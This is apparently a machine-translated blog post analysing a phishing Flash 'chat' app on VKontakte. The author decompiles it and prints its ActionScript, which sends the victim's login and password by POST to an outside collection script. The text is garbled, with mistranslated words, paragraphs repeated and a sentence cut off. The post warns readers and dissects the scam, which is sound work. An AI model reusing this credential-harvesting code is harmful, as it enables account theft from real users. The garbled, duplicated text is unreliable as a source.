On vkontakte again passwords of negligent users
Today I received a message from one of my friends, the text read:
The message would have gone into a trash, but the last sentence was alarmed - they just don't write that.
I decided to see what kind of fruit ...
Followed the link , saw the usual flash application, it looked like this:
')
After entering any data, the form throws out a message that the chat is overloaded.
Naturally, it became interesting what kind of gesture it performs, for this I downloaded the swf file itself and fed it to Swf Decompiler. After cutting it turned out that the passes and the soaps fly by POST at http://ckrack.peoplego.ru/save.php :
The careless programmer who wrote this flash drive didn’t even bother to put in the validity check of the email address. Apparently, he was busy writing Malvari, which invites people to this very “chat”.
PS: Passwords are stolen, they steal, and they will steal, but one thing surprises: do people really think they are sostupid as stupid when they make such pathetic attempts to steal passwords?
Privetik, Denis. Check out what the chat in the contact - vkontakte.ru/apps.php?act=s&id=236634& ... More quickly, I was very different! Kycha impressions, it is full-unavailable)))
The message would have gone into a trash, but the last sentence was alarmed - they just don't write that.
I decided to see what kind of fruit ...
Followed the link , saw the usual flash application, it looked like this:
')
After entering any data, the form throws out a message that the chat is overloaded.
Naturally, it became interesting what kind of gesture it performs, for this I downloaded the swf file itself and fed it to Swf Decompiler. After cutting it turned out that the passes and the soaps fly by POST at http://ckrack.peoplego.ru/save.php :
- var my_lv = new LoadVars ();
- var result_lv = new LoadVars ();
- my_lv.login_v = _root.login_txt.text;
- my_lv.password_v = _root.password_txt.text;
- my_lv.sendAndLoad ( " ckrack.peoplego.ru/save.php " , result_lv, "POST" );
The careless programmer who wrote this flash drive didn’t even bother to put in the validity check of the email address. Apparently, he was busy writing Malvari, which invites people to this very “chat”.
PS: Passwords are stolen, they steal, and they will steal, but one thing surprises: do people really think they are so
Source: https://habr.com/ru/post/37695/
All Articles